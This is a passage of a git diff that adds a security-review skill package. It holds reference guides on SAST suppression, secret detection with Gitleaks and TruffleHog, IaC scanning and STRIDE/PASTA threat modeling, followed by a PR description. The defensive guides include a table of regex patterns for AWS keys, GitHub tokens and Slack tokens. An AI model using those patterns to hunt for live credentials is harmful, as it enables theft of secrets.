+  pattern: $EL.innerHTML = $INPUT
+  not:
+    pattern: $EL.innerHTML = "..."
+message: "Direct innerHTML assignment with dynamic input enables XSS. Use textContent or a sanitizer."
+severity: warning
+metadata:
+  cwe: CWE-79
+```
+
+```bash
+# Run a single rule
+ast-grep scan --rule rules/detect-innerhtml.yml src/
+
+# Run all rules in a directory
+ast-grep scan --rule rules/ src/
+
+# JSON output
+ast-grep scan --rule rules/ --json src/
+```
+
+ast-grep rules can be committed to the repository and run as a pre-commit hook or CI step without installing a language-specific runtime, making it suitable for polyglot repositories.
+
+---
+
+## CI/CD Pipeline Setup
+
+### Semgrep in GitHub Actions
+
+```yaml
+name: Semgrep
+on:
+  push:
+    branches: [main]
+  pull_request: {}
+
+jobs:
+  semgrep:
+    runs-on: ubuntu-latest
+    container:
+      image: semgrep/semgrep
+    steps:
+      - uses: actions/checkout@v4
+      - name: Run Semgrep
+        run: semgrep scan --config p/security-audit --config p/owasp-top-ten --config .semgrep/ --sarif --output semgrep.sarif .
+        env:
+          SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }}
+      - name: Upload SARIF
+        uses: github/codeql-action/upload-sarif@v3
+        with:
+          sarif_file: semgrep.sarif
+```
+
+### Blocking vs Non-Blocking Strategy
+
+Do not block the pipeline on day one:
+
+1. **Weeks 1-2:** Run in report-only mode. Collect baseline findings and understand noise level.
+2. **Weeks 3-4:** Triage existing findings. Suppress acknowledged false positives with documented reasons.
+3. **Month 2+:** Fail only on findings introduced in the current diff (`--diff-depth 0` for Semgrep, `--baseline-commit` against the target branch). Pre-existing findings do not block.
+4. **Ongoing:** Reduce the backlog incrementally. Tighten blocking criteria as it shrinks.
+
+---
+
+## False Positive Management
+
+### Triage Workflow
+
+For each finding: read the matched code in context, trace whether attacker-controlled input reaches the sink, check whether existing sanitization mitigates the risk, then classify as **true positive** (fix it), **false positive** (suppress with reason), or **accepted risk** (document and suppress).
+
+### Suppression Syntax by Tool
+
+**Semgrep:**
+
+```python
+# nosemgrep: sql-string-concat -- query is built from an allowlist of column names, not user input
+query = "SELECT " + column_name + " FROM users"
+```
+
+**Bandit:**
+
+```python
+result = subprocess.run(cmd, shell=True)  # nosec B602 -- cmd is constructed from a hardcoded allowlist
+```
+
+**ESLint:**
+
+```javascript
+element.innerHTML = sanitizedHtml; // eslint-disable-line no-unsanitized/property -- sanitized with DOMPurify
+```
+
+**CodeQL:** Dismiss alerts directly in the GitHub Security tab. Select a reason (false positive, used in tests, won't fix) and add a comment. Dismissed alerts are excluded from future runs and tracked in the audit log.
+
+### Baseline Approach
+
+Use Semgrep's `--baseline-commit` flag to report only findings introduced since a specific commit:
+
+```bash
+semgrep scan --config p/security-audit --baseline-commit $(git rev-parse origin/main) .
+```
+
+For CodeQL, configure the workflow to annotate pull requests with new alerts only. This prevents pre-existing technical debt from blocking new work while still surfacing regressions.
+
+### Suppression Hygiene
+
+- Never suppress without a rule ID. Bare `# nosemgrep` or `# nosec` without specifics hides future regressions.
+- Review suppressions quarterly. Remove suppressions where the underlying code has changed.
+- Track suppression counts in dashboards. A rising suppression count without a corresponding fix count signals a process problem, not a tooling problem.

--- a/skills/security-review/references/secrets-and-iac-scanning.md
+++ b/skills/security-review/references/secrets-and-iac-scanning.md
@@ -1,0 +1,361 @@
+# Secrets and Infrastructure-as-Code Scanning
+
+Sources: Gitleaks documentation, TruffleHog documentation, Checkov documentation (Bridgecrew), tfsec documentation (Aqua Security), OWASP Secrets Management Cheat Sheet
+
+Covers: Secret detection tooling (Gitleaks, TruffleHog, detect-secrets), incident response for leaked credentials, common secret patterns, IaC scanning (Checkov, tfsec, KICS, Trivy), top cloud misconfigurations by provider, and CI pipeline integration.
+
+---
+
+## Secret Detection
+
+Secrets committed to source control are one of the highest-severity, lowest-effort attack vectors. A single leaked AWS key can result in full account compromise within minutes of a public push.
+
+### Tool Selection
+
+| Tool | Strength | Best For |
+|------|----------|----------|
+| Gitleaks | Git history scanning, pre-commit hooks | General secret detection, CI gates |
+| TruffleHog | Credential verification (tests if live) | Incident response, confirmed leaks |
+| detect-secrets | Baseline approach, low false positives | Enterprise environments, gradual adoption |
+| GitHub Secret Scanning | GitHub-native, partner notifications | GitHub-hosted repos with push protection |
+
+Use Gitleaks as the default CI gate. Add TruffleHog during incident response to confirm whether a leaked credential is still active.
+
+### Gitleaks
+
+**Installation:**
+
+```bash
+brew install gitleaks          # macOS
+# Linux / CI: download from GitHub releases
+```
+
+**Usage:**
+
+```bash
+# Scan full history
+gitleaks detect --source . --verbose
+
+# Scan only staged changes (pre-commit)
+gitleaks protect --staged
+
+# JSON output for downstream processing
+gitleaks detect --source . --report-format json --report-path gitleaks-report.json
+```
+
+**Configuration — `.gitleaks.toml`:**
+
+```toml
+[extend]
+useDefault = true
+
+[[rules]]
+id = "custom-internal-api-key"
+description = "Internal API key pattern"
+regex = '''MYAPP_[A-Z0-9]{32}'''
+tags = ["api-key", "internal"]
+
+[allowlist]
+description = "Global allowlist"
+regexes = [
+  '''AKIAIOSFODNN7EXAMPLE''',  # Rotated key — safe to ignore in history
+]
+paths = [
+  '''tests/fixtures/''',
+]
+```
+
+**Pre-commit hook:**
+
+```yaml
+# .pre-commit-config.yaml
+repos:
+  - repo: https://github.com/gitleaks/gitleaks
+    rev: v8.18.0
+    hooks:
+      - id: gitleaks
+```
+
+Install with `pre-commit install`. This blocks commits containing detected secrets before they reach the remote.
+
+**Inline suppression:**
+
+```python
+EXAMPLE_KEY = "AKIAIOSFODNN7EXAMPLE"  # gitleaks:allow
+```
+
+### TruffleHog
+
+TruffleHog actively tests detected credentials against their respective APIs to confirm whether they are valid. This eliminates false positives and prioritizes response effort.
+
+**Usage:**
+
+```bash
+# Scan filesystem
+trufflehog filesystem . --only-verified
+
+# Scan full git history
+trufflehog git file://. --only-verified
+
+# Include unverified results (higher noise, useful for audits)
+trufflehog git file://. --include-detectors=all
+```
+
+The `--only-verified` flag sends test requests to AWS, GitHub, Slack, Stripe, and 700+ services to confirm the credential is live. A verified result means the secret is active and must be rotated immediately.
+
+Use TruffleHog in incident response mode — not as a primary CI gate — because verification requests may appear in the service's audit logs.
+
+**Supported detector categories (partial):**
+
+| Category | Examples |
+|----------|---------|
+| Cloud providers | AWS, GCP, Azure |
+| Source control | GitHub, GitLab, Bitbucket |
+| Communication | Slack, Twilio, SendGrid |
+| Payments | Stripe, Square, PayPal |
+| CI/CD | CircleCI, Travis CI, Jenkins |
+
+### Incident Response for Leaked Secrets
+
+Execute this procedure in order when a secret is found in git history or a public location. Speed matters: automated scanners harvest newly pushed secrets within seconds.
+
+1. **Rotate the credential immediately.** Revoke the old key and issue a new one before doing anything else.
+2. **Audit access logs.** Check the service's audit trail for unauthorized use. For AWS, query CloudTrail; for GitHub tokens, check recent API activity.
+3. **Assess blast radius.** Determine what the credential could access and escalate accordingly.
+4. **Remove from git history** using BFG Repo-Cleaner (faster) or `git filter-branch`:
+
+```bash
+# BFG Repo-Cleaner
+java -jar bfg.jar --replace-text secrets.txt repo.git
+git reflog expire --expire=now --all && git gc --prune=now --aggressive
+git push --force
+
+# git filter-branch — remove a specific file
+git filter-branch --force --index-filter \
+  'git rm --cached --ignore-unmatch path/to/secrets.env' \
+  --prune-empty --tag-name-filter cat -- --all
+```
+
+Removing from history does not remove the secret from GitHub's cache or any forks. Treat the credential as permanently compromised regardless.
+
+5. **Add the rotated value to the Gitleaks allowlist** to prevent future alerts on the now-harmless historical value.
+6. **Install pre-commit hooks** to prevent recurrence.
+7. **Notify affected parties** if audit logs show unauthorized access.
+
+### Common Secret Patterns
+
+| Pattern | Format | Risk |
+|---------|--------|------|
+| AWS access key | `AKIA[A-Z0-9]{16}` | Critical |
+| GitHub personal access token | `ghp_[a-zA-Z0-9]{36}` | High |
+| GitHub OAuth / Actions token | `gho_` / `ghs_` prefix | High |
+| Slack bot token | `xoxb-[0-9]+-[a-zA-Z0-9]+` | High |
+| Slack user token | `xoxp-[0-9]+-[a-zA-Z0-9]+` | High |
+| Database URL | `postgres://user:pass@host/db` | Critical |
+| Private key block | `-----BEGIN RSA PRIVATE KEY-----` | Critical |
+| JWT secret (raw) | Long random string assigned to `JWT_SECRET` | High |
+| API key in URL | `https://api.example.com?key=abc123` | Medium–High |
+| `.env` file committed | Any `.env` in git history | Variable |
+
+Flag any of these patterns during code review regardless of whether automated tools catch them.
+
+---
+
+## Infrastructure-as-Code Scanning
+
+IaC misconfigurations are a leading cause of cloud data breaches. Scanning Terraform, CloudFormation, and Kubernetes manifests before deployment catches issues that are expensive to fix post-deployment.
+
+### Tool Selection
+
+| Tool | IaC Types Supported | Strength |
+|------|---------------------|----------|
+| Checkov | Terraform, CloudFormation, K8s, Helm, Dockerfile, ARM | Broadest coverage, 1000+ checks |
+| tfsec | Terraform | Deep Terraform analysis, fast, low false positives |
+| KICS | Terraform, Docker, K8s, Ansible, CloudFormation | Multi-IaC, good for mixed stacks |
+| Trivy | Terraform, CloudFormation, Dockerfile, K8s | Single tool if already used for SCA |
+
+Use Checkov as the default for mixed IaC stacks. Use tfsec alongside Checkov for Terraform-heavy projects — it catches issues Checkov misses.
+
+### Checkov
+
+**Installation:**
+
+```bash
+pip install checkov
+```
+
+**Usage:**
+
+```bash
+checkov -d .                                          # Scan directory
+checkov -f main.tf                                    # Scan single file
+checkov -d . -o json > checkov-results.json           # JSON output
+checkov -d . --check CKV_AWS_18,CKV_AWS_20            # Run specific checks
+checkov -d . --skip-check CKV_AWS_18                  # Skip specific checks
+```
+
+**Key check categories:**
+
+| Category | Example Checks |
+|----------|---------------|
+| Encryption at rest | S3 SSE, EBS encryption, RDS storage encryption |
+| Encryption in transit | ALB HTTPS listeners, RDS SSL enforcement |
+| Public access | S3 public access block, RDS `publicly_accessible` |
+| Logging | S3 access logging, CloudTrail enabled, VPC flow logs |
+| IAM | Wildcard actions, wildcard resources, admin policies |
+| Network | Security group ingress `0.0.0.0/0`, default VPC SG |
+
+**Inline suppression:**
+
+```hcl
+resource "aws_s3_bucket" "example" {
+  bucket = "my-bucket"
+  #checkov:skip=CKV_AWS_18:Access logging not required for this internal bucket
+}
+```
+
+### tfsec
+
+**Installation:**
+
+```bash
+brew install tfsec
+```
+
+**Usage:**
+
+```bash
+tfsec .                                    # Scan current directory
+tfsec . --minimum-severity HIGH            # Filter by severity
+tfsec . --format json > tfsec-results.json
+```
+
+**Key checks by resource:**
+
+| Resource | Check | Risk |
+|----------|-------|------|
+| `aws_s3_bucket` | Public access block missing | Data exposure |
+| `aws_security_group` | Ingress `0.0.0.0/0` on port 22/3389 | Unauthorized access |
+| `aws_db_instance` | `publicly_accessible = true` | Database exposure |
+| `aws_iam_policy` | Wildcard `*` in actions or resources | Privilege escalation |
+| `aws_kms_key` | Key rotation disabled | Compliance failure |
+| `azurerm_storage_account` | `allow_blob_public_access = true` | Data exposure |
+
+**Inline suppression:**
+
+```hcl
+#tfsec:ignore:aws-s3-enable-versioning:Versioning managed by lifecycle policy
+resource "aws_s3_bucket" "example" { ... }
+```
+
+### Common IaC Misconfigurations
+
+**AWS:**
+
+| Misconfiguration | Terraform Attribute | Risk |
+|-----------------|---------------------|------|
+| Public S3 bucket | `block_public_acls = false` | Data exposure |
+| Overly permissive IAM | `actions = ["*"]` | Privilege escalation |
+| Unencrypted EBS volume | `encrypted = false` | Data at rest exposure |
+| Open security group | `cidr_blocks = ["0.0.0.0/0"]` on sensitive ports | Unauthorized access |
+| RDS publicly accessible | `publicly_accessible = true` | Database exposure |
+| CloudTrail disabled | Missing `aws_cloudtrail` resource | No audit trail |
+
+**GCP:**
+
+| Misconfiguration | Risk |
+|-----------------|------|
+| Public Cloud Storage bucket | Data exposure |
+| Default service account on compute | Overly broad permissions |
+| Missing audit logging for admin activity | No audit trail |
+| Firewall rule allowing `0.0.0.0/0` on SSH | Unauthorized access |
+
+**Azure:**
+
+| Misconfiguration | Risk |
+|-----------------|------|
+| Public blob storage container | Data exposure |
+| Microsoft Defender for Cloud disabled | Reduced threat detection |
+| Missing NSG rules on subnets | Unrestricted lateral movement |
+| Storage account allowing HTTP | Data in transit exposure |
+
+**Kubernetes:**
+
+| Misconfiguration | Risk |
+|-----------------|------|
+| `privileged: true` in security context | Container escape |
+| `hostPath` volume mounts | Host filesystem access |
+| Missing `NetworkPolicy` resources | Unrestricted pod-to-pod traffic |
+| No resource limits (`cpu`, `memory`) | Denial of service via resource exhaustion |
+| `automountServiceAccountToken: true` (default) | Token theft from compromised pod |
+| Running as root (`runAsNonRoot: false`) | Privilege escalation on container escape |
+
+---
+
+## CI Pipeline Integration
+
+Run secret scanning and IaC scanning as blocking gates on every pull request.
+
+```yaml
+# .github/workflows/security-scan.yml
+name: Security Scan
+
+on:
+  pull_request:
+  push:
+    branches: [main]
+
+jobs:
+  security-scan:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      security-events: write
+
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0  # Full history required for secret scanning
+
+      - name: Secret scan (Gitleaks)
+        uses: gitleaks/gitleaks-action@v2
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: IaC scan (Checkov)
+        uses: bridgecrewio/checkov-action@master
+        with:
+          directory: .
+          soft_fail: false
+          output_format: sarif
+          output_file_path: checkov.sarif
+
+      - name: Upload Checkov SARIF
+        uses: github/codeql-action/upload-sarif@v3
+        if: always()
+        with:
+          sarif_file: checkov.sarif
+
+      - name: IaC scan (tfsec)
+        uses: aquasecurity/tfsec-action@v1.0.0
+        with:
+          soft_fail: false
+```
+
+**Key pipeline decisions:**
+
+| Decision | Recommendation |
+|----------|---------------|
+| `fetch-depth` | Always `0` for secret scanning — shallow clones miss history |
+| `soft_fail` | `false` for blocking gates; `true` only during initial rollout |
+| SARIF upload | Upload to GitHub Security tab for centralized triage |
+| Scan scope | Scan the full repository, not just changed files |
+
+**Rollout strategy for existing repositories:**
+
+1. Run in `soft_fail: true` mode for one sprint to baseline findings.
+2. Triage results: fix critical findings, add allowlist entries for confirmed false positives.
+3. Switch to `soft_fail: false` to enforce the gate.
+4. Add pre-commit hooks to catch issues before they reach CI.
+
+Do not skip the baseline phase on large repositories. Blocking CI on day one with hundreds of pre-existing findings creates friction that causes teams to disable scanning entirely.

--- a/skills/security-review/references/threat-modeling.md
+++ b/skills/security-review/references/threat-modeling.md
@@ -1,0 +1,263 @@
+# Threat Modeling
+
+Sources: Shostack (Threat Modeling: Designing for Security), OWASP Threat Modeling documentation, UcedaVelez/Morana (Risk Centric Threat Modeling), PASTA methodology documentation
+
+Covers: When to threat model, STRIDE framework (per-element application), PASTA 7-stage methodology, attack trees, trust boundaries, data flow diagrams, and lightweight 4-question sessions.
+
+---
+
+## When to Threat Model
+
+Match the depth of analysis to the scope of change. Over-investing in lightweight changes wastes time; under-investing in architectural changes creates blind spots.
+
+| Trigger | Depth |
+|---------|-------|
+| New feature with external input | Lightweight (30 min) |
+| New service or microservice | Standard STRIDE (2-4 hours) |
+| Architecture redesign | Full PASTA (1-2 days) |
+| Pre-release compliance audit | Full PASTA + documentation |
+| Simple UI change, no new data flows | Skip |
+
+Treat threat modeling as a design activity, not a gate. Run it during design, not after implementation. Findings discovered post-implementation cost 10-100x more to remediate.
+
+---
+
+## STRIDE Framework
+
+STRIDE is the most widely used threat modeling framework. Apply it systematically to each element in a data flow diagram. Each letter names a threat category and maps to a violated security property.
+
+| Threat | Definition | Security Property Violated | Example |
+|--------|-----------|---------------------------|---------|
+| Spoofing | Pretending to be something or someone else | Authentication | Forged JWT, stolen session cookie |
+| Tampering | Modifying data or code without authorization | Integrity | SQL injection, parameter tampering, log manipulation |
+| Repudiation | Denying that an action occurred | Non-repudiation | Missing audit logs, unsigned transactions |
+| Information Disclosure | Exposing information to unauthorized parties | Confidentiality | Error stack traces, directory listing, verbose headers |
+| Denial of Service | Making a service unavailable to legitimate users | Availability | ReDoS, resource exhaustion, amplification attacks |
+| Elevation of Privilege | Gaining capabilities beyond what is authorized | Authorization | IDOR, privilege escalation, JWT algorithm confusion |
+
+### STRIDE Per Element
+
+Not every threat applies to every element type. Applying STRIDE per element focuses analysis and avoids wasted effort.
+
+| Element | Applicable Threats | Rationale |
+|---------|-------------------|-----------|
+| External entity | S, R | External entities can impersonate others and deny actions; they do not process or store data directly |
+| Process | S, T, R, I, D, E | Processes execute logic and are exposed to the full threat surface |
+| Data store | T, R, I, D | Stores hold data at rest; they can be tampered with, read, or made unavailable |
+| Data flow | T, I, D | Data in transit can be intercepted, modified, or disrupted |
+| Trust boundary | All | Crossing a trust boundary is the highest-risk event; apply all six categories |
+
+### Conducting a STRIDE Analysis
+
+Follow these steps in order. Do not skip the data flow diagram — it is the foundation of the analysis.
+
+1. **Draw the data flow diagram.** Include all processes, data stores, external entities, data flows, and trust boundaries. Every element that handles, transforms, or transmits data must appear.
+2. **Enumerate elements.** List each process, store, external entity, and flow as a row in a working document.
+3. **Walk STRIDE per element.** For each element, apply the applicable threat categories from the table above. Ask: "How could an attacker exploit this element under this threat category?"
+4. **Assess each identified threat.** For each threat, determine: likelihood (low/medium/high), impact (low/medium/high), and existing mitigations (none/partial/full).
+5. **Prioritize.** Unmitigated threats that cross trust boundaries take priority. High-impact, low-mitigation threats come next.
+6. **Document findings.** Record each threat with its element, category, likelihood, impact, current mitigation, and recommended remediation.
+7. **Assign ownership.** Each finding must have an owner and a target resolution date before the session closes.
+
+### STRIDE Mitigation Patterns
+
+| Threat | Standard Mitigations |
+|--------|---------------------|
+| Spoofing | Strong authentication (MFA, certificate pinning), session binding, short-lived tokens |
+| Tampering | Input validation, parameterized queries, HMAC signatures, integrity checks |
+| Repudiation | Append-only audit logs, signed log entries, centralized log aggregation |
+| Information Disclosure | Least-privilege access, encryption at rest and in transit, sanitized error messages |
+| Denial of Service | Rate limiting, resource quotas, circuit breakers, input size limits |
+| Elevation of Privilege | Least-privilege roles, RBAC enforcement, server-side authorization checks |
+
+---
+
+## PASTA (Process for Attack Simulation and Threat Analysis)
+
+PASTA is a risk-centric, 7-stage methodology. It produces a full risk assessment rather than a threat list, making it suitable for compliance requirements and business stakeholder communication.
+
+| Stage | Name | Activity | Output |
+|-------|------|----------|--------|
+| 1 | Business Objectives | Identify business-critical assets, data classifications, and regulatory constraints | Asset inventory, data classification matrix |
+| 2 | Technical Scope | Map the technology stack, infrastructure components, and data flows | Architecture diagram, technology inventory |
+| 3 | Application Decomposition | Identify entry points, trust boundaries, data stores, and privilege levels | Data flow diagrams, trust zone map |
+| 4 | Threat Analysis | Identify threat agents, attack motivations, and threat intelligence relevant to the system | Threat actor profiles, threat scenarios |
+| 5 | Vulnerability Analysis | Map known vulnerabilities (CVE, CWE) to identified assets and components | Vulnerability inventory with asset mapping |
+| 6 | Attack Modeling | Build attack trees and kill chain scenarios for the highest-priority threats | Attack trees, exploit scenario narratives |
+| 7 | Risk Analysis | Score residual risk, prioritize remediation, and produce a roadmap | Risk matrix, remediation roadmap with business justification |
+
+### When PASTA vs STRIDE
+
+| Factor | STRIDE | PASTA |
+|--------|--------|-------|
+| Time available | 2-4 hours | 1-2 days |
+| Compliance requirement | No | Yes |
+| Stakeholder audience | Engineering team | Engineering + business + compliance |
+| Focus | Technical threats | Business risk |
+| Output | Threat list with mitigations | Full risk assessment with roadmap |
+| Suitable for | Feature-level and service-level analysis | System-level and pre-release audits |
+
+Use STRIDE as the default. Escalate to PASTA when a compliance artifact is required, when business stakeholders need to participate, or when the system handles regulated data (PII, PHI, PCI).
+
+---
+
+## Attack Trees
+
+An attack tree is a visual representation of how an attacker might achieve a goal. Use attack trees during PASTA Stage 6 or as a standalone tool when analyzing a specific high-risk threat.
+
+### Structure
+
+- **Root node:** The attacker's goal (e.g., "Steal user data", "Disrupt payment processing").
+- **OR nodes:** Alternative methods to achieve the parent goal. Any one child succeeding achieves the parent.
+- **AND nodes:** Prerequisites that must all be satisfied to achieve the parent goal.
+- **Leaf nodes:** Atomic attack steps that require no further decomposition.
+
+Label each leaf with an estimated difficulty (low/medium/high) and whether a known exploit exists. This enables prioritization without full risk scoring.
+
+### Example: Access Admin Panel
+
+```
+Access admin panel (OR)
+├── Exploit authentication bypass (AND)
+│   ├── Discover login endpoint
+│   └── Inject SQL into username field
+├── Steal admin credentials (AND)
+│   ├── Phish admin user via spear-phishing email
+│   └── Replay stolen session token before expiry
+└── Exploit authorization flaw (AND)
+    ├── Authenticate as regular user
+    └── Modify role parameter in API request (IDOR)
+```
+
+### Reading Attack Trees for Prioritization
+
+- Paths with all low-difficulty leaves represent the highest-priority remediation targets.
+- AND nodes increase attacker cost — adding a prerequisite raises the bar.
+- OR nodes decrease attacker cost — each alternative path is an independent risk.
+- Removing a single AND-node prerequisite can block an entire attack path.
+- Removing an OR-node alternative reduces the attack surface but does not eliminate the threat.
+
+---
+
+## Trust Boundaries
+
+A trust boundary exists wherever data crosses between components operating at different privilege or trust levels. Every trust boundary crossing is a potential attack surface. Enumerate all boundaries before conducting STRIDE analysis.
+
+| Boundary | Example | What to Verify |
+|----------|---------|----------------|
+| Internet to web server | Inbound HTTP/S requests | Input validation, rate limiting, WAF rules, TLS configuration |
+| Web server to database | SQL queries over internal network | Parameterized queries, least-privilege database user, network segmentation |
+| Frontend to backend API | AJAX calls, form submissions | Authentication header, authorization check, schema validation |
+| Microservice to microservice | Internal REST or gRPC calls | mTLS, service mesh authorization policy, input validation |
+| User upload to file system | Multipart form file writes | File type validation, path traversal prevention, antivirus scanning |
+| Third-party API to your service | Webhooks, OAuth callbacks | Signature verification, replay protection, input validation |
+| Admin interface to production | Privileged management operations | MFA enforcement, IP allowlisting, audit logging |
+| CI/CD pipeline to production | Deployment automation | Secret management, artifact signing, least-privilege deploy credentials |
+
+### Trust Boundary Rules
+
+- Validate all data crossing a trust boundary, regardless of the source's apparent trustworthiness.
+- Never trust data from a lower-trust zone without explicit validation, even if it originated in a higher-trust zone.
+- Authenticate and authorize at every boundary, not just at the perimeter.
+- Log all trust boundary crossings for audit purposes.
+
+---
+
+## Data Flow Diagrams
+
+A data flow diagram (DFD) is the primary artifact for threat modeling. Draw one before conducting any STRIDE or PASTA analysis.
+
+### DFD Element Notation
+
+| Element | Notation | Description |
+|---------|----------|-------------|
+| Process | Circle or rounded rectangle | A component that transforms or acts on data |
+| Data store | Two parallel horizontal lines | Persistent storage: database, file system, cache |
+| External entity | Rectangle | An actor or system outside the trust boundary of the application |
+| Data flow | Labeled arrow | Data moving between elements; label with protocol and data type |
+| Trust boundary | Dashed line | Separates zones of different trust levels |
+
+### DFD Construction Rules
+
+1. Start with external entities (users, third-party services, partner systems).
+2. Trace each data flow from entry to storage to response.
+3. Draw trust boundaries around logical trust zones, not physical infrastructure.
+4. Label every data flow with the protocol (HTTPS, SQL, gRPC) and the data classification (PII, session token, public).
+5. Include all data stores, even internal caches and message queues.
+6. Keep the diagram at one level of abstraction. Use child diagrams to decompose complex processes.
+
+### Example: Web Application DFD (Textual)
+
+```
+[User Browser] --HTTPS (credentials, form data)--> |Trust Boundary: Internet/DMZ|
+    --> (Web Server / App Process)
+            |
+            +--SQL (parameterized queries)--> [[Primary Database]]
+            |
+            +--HTTPS (API request)--> |Trust Boundary: DMZ/External|
+                    --> [Third-Party Payment API]
+            |
+            +--Redis protocol--> [[Session Cache]]
+
+[Admin User] --HTTPS (admin credentials)--> |Trust Boundary: Admin/App|
+    --> (Admin Process)
+            |
+            +--SQL (privileged queries)--> [[Primary Database]]
+```
+
+Each arrow in this diagram is a candidate data flow for STRIDE analysis. Each dashed boundary is a candidate trust boundary for full STRIDE coverage.
+
+---
+
+## Lightweight Threat Modeling
+
+Use the 4-question framework (Shostack) for feature-level changes, pull request reviews, and time-constrained sessions. Target 30 minutes. Do not skip this for any change that introduces new external input, new data storage, or new trust boundary crossings.
+
+### The 4 Questions
+
+**1. What are we building?**
+Write one paragraph describing the feature or change: what data it handles, what systems it touches, and what users interact with it. This scopes the analysis and surfaces assumptions.
+
+**2. What can go wrong?**
+Brainstorm 5-10 threats in 15 minutes. Use STRIDE categories as prompts if the team is stuck. Do not filter during brainstorming — capture everything, then triage.
+
+**3. What are we doing about it?**
+For each identified threat, map it to an existing control (authentication, validation, rate limiting) or identify a new control that must be added before shipping.
+
+**4. Did we do a good job?**
+Review the output with at least one other team member. Ask: "Is there a threat we missed? Is there a control we assumed exists but have not verified?"
+
+### Lightweight Session Output
+
+Capture the output in a short document or pull request comment:
+
+```
+Feature: [name]
+Date: [date]
+Participants: [names]
+
+Threats identified:
+1. [Threat] — [Mitigation / Owner]
+2. [Threat] — [Mitigation / Owner]
+...
+
+Open items:
+- [Any unresolved threat or control gap]
+```
+
+Attach this output to the pull request or design document. It serves as a lightweight audit trail and prompts reviewers to verify that identified mitigations were implemented.
+
+---
+
+## Threat Modeling Anti-Patterns
+
+Avoid these failure modes that reduce the value of threat modeling sessions.
+
+| Anti-Pattern | Consequence | Correction |
+|-------------|-------------|------------|
+| Modeling after implementation | Findings are expensive to fix; teams resist changes | Run threat modeling during design, before code is written |
+| No data flow diagram | Analysis is vague and misses data stores and flows | Always draw the DFD first, even a rough sketch |
+| Treating all threats as equal | High-risk items are buried in low-risk noise | Score likelihood and impact; prioritize unmitigated trust boundary crossings |
+| No ownership assigned | Findings are documented but never remediated | Every finding must have a named owner and a target date |
+| One-time activity | System evolves but threat model does not | Re-run threat modeling on every significant architectural change |
+| Security team only | Engineers lack context; findings are disconnected from implementation | Include the engineers who will implement the mitigations |

--- a/skills/security-review/skills.json
+++ b/skills/security-review/skills.json
@@ -1,0 +1,18 @@
+{
+  "name": "@tank/security-review",
+  "version": "1.0.0",
+  "description": "Comprehensive security review for any codebase, PR, or architecture. Covers OWASP Top 10 (2021) and API Security Top 10 (2023), CWE Top 25, code review methodology (differential and full audit), SAST tools (Semgrep, CodeQL, Bandit, ESLint security), dependency and supply chain scanning (npm audit, Trivy, Snyk, OSV-Scanner, SBOM), secret detection (Gitleaks, TruffleHog), IaC scanning (Checkov, tfsec), threat modeling (STRIDE, PASTA), language-specific vulnerability patterns (JS/TS, Python, Go, Rust, Java), and remediation patterns for every vulnerability class. Synthesizes OWASP Foundation standards, MITRE CWE, NIST NVD, Trail of Bits audit methodology, and OWASP Testing Guide (WSTG v5). Triggers: security review, security audit, OWASP, vulnerability, CVE, CWE, code audit, threat model, STRIDE, PASTA, Semgrep, CodeQL, SAST, DAST, dependency scan, npm audit, Trivy, Snyk, Gitleaks, TruffleHog, secret scanning, supply chain, XSS, SQL injection, SSRF, CSRF, IDOR, Checkov, tfsec, IaC security, security scanning, secure code review, attack surface, SBOM, ASVS, security checklist.",
+  "permissions": {
+    "network": {
+      "outbound": []
+    },
+    "filesystem": {
+      "read": [
+        "**/*"
+      ],
+      "write": []
+    },
+    "subprocess": false
+  },
+  "repository": "https://github.com/tankpkg/skills"
+}


### PR DESCRIPTION
## Summary

- Adds `@tank/security-review` — a comprehensive, unified security review skill for any codebase, PR, or architecture
- 8 reference files covering OWASP Top 10, API Security Top 10, CWE Top 25, SAST tools, dependency/supply chain scanning, secret detection, IaC scanning, threat modeling (STRIDE/PASTA), language-specific vulnerability patterns, and remediation patterns
- 3,080 lines of synthesized security knowledge from OWASP Foundation, MITRE CWE, NIST NVD, Trail of Bits audit methodology, and OWASP WSTG v5

## Structure

```
skills/security-review/
├── SKILL.md (137 lines) — entry point with 6 quick-starts, 3 decision trees
├── skills.json — @tank/security-review v1.0.0
└── references/
    ├── owasp-vulnerability-taxonomy.md (362 lines)
    ├── code-review-workflow.md (323 lines)
    ├── sast-and-scanning-tools.md (397 lines)
    ├── dependency-and-supply-chain.md (378 lines)
    ├── secrets-and-iac-scanning.md (361 lines)
    ├── language-vulnerability-patterns.md (392 lines)
    ├── threat-modeling.md (263 lines)
    └── remediation-patterns.md (449 lines)
```

## Validation

- ✅ SKILL.md under 200 lines (137)
- ✅ 39 trigger phrases in description
- ✅ All 8 reference files follow conventions (H1 + Sources + no frontmatter + no emoji)
- ✅ All reference files within 250-450 line range
- ✅ skills.json valid with minimal permissions
- ✅ Exclusions defer to @tank/auth-patterns, @solaraai/devops-mastery, @tank/macos-maintenance